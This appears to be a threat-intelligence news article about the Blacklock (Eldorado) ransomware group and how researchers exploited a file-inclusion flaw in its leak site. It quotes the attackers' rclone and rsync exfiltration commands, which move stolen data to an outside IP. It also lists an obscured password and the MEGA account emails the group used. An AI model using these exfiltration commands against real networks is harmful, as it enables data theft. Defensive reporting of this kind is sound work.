Blacklock ransomware, also known as “El Dorado” or “Eldorado,” emerged as one of the most aggressive ransomware-as-a-service (RaaS) operations in early 2025.
The group rapidly accelerated attacks across multiple sectors including electronics, academia, religious organizations, defense, healthcare, technology, and government agencies.
Their global footprint extended to victims in at least 14 countries, including the United States, United Kingdom, Canada, France, Brazil, and the United Arab Emirates.
The ransomware group established a sophisticated operational structure, implementing affiliate networks and creating Data Leak Sites (DLS) on the TOR network where they published stolen information from victims unwilling to pay ransoms.
Their operational rules prohibited targeting victims in BRICS alliance countries and the Commonwealth of Independent States, suggesting possible Eastern European or Chinese connections.
Resecurity analysts identified a critical vulnerability in Blacklock’s DLS infrastructure during the winter holiday season of 2024-2025.
.webp)
Through sophisticated exploitation techniques, researchers gained unprecedented access to the threat actors’ backend systems, allowing them to monitor planned attacks and alert potential victims before data exfiltration occurred.
By January 2025, the intrusion had yielded over 7TB of compromised data and provided crucial intelligence that helped prevent several high-profile attacks.
In one case, Resecurity contacted the Canadian Centre for Cyber Security 13 days before planned data publication from a Canadian victim, providing valuable time for defensive measures.
The Local File Include Vulnerability
The successful exploitation leveraged a Local File Include (LFI) vulnerability in the TOR-hosted Data Leak Site, giving researchers access to configuration files, system logs, and even command history.
This severe OPSEC failure revealed how the attackers moved stolen data between compromised networks and their infrastructure.
.webp)
The command history showed the ransomware operators used rclone for data exfiltration:-
./rclone copy --progress --transfers=40 --checkers=2
rsync -avr data_leak@45.155.173.96:~/site/public/Dat
./rclone obscure 'pNzZzf+p#so3s7UOcU(kO)7Hr;vw(XAi'
The logs revealed at least eight MEGA accounts created by the group to store stolen data before publication, with email addresses like “emptyzubinnecrouzo-6860@yopmail[.]com” and “megaO8Omega@gmail[.]com”.
In some cases, the threat actors deployed the MEGA client directly on victims’ servers to facilitate covert data exfiltration.
The intrusion ultimately contributed to Blacklock’s downfall, as another ransomware group called DragonForce Ransomware publicly exposed the compromise in March 2025, effectively ending Blacklock’s operations.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
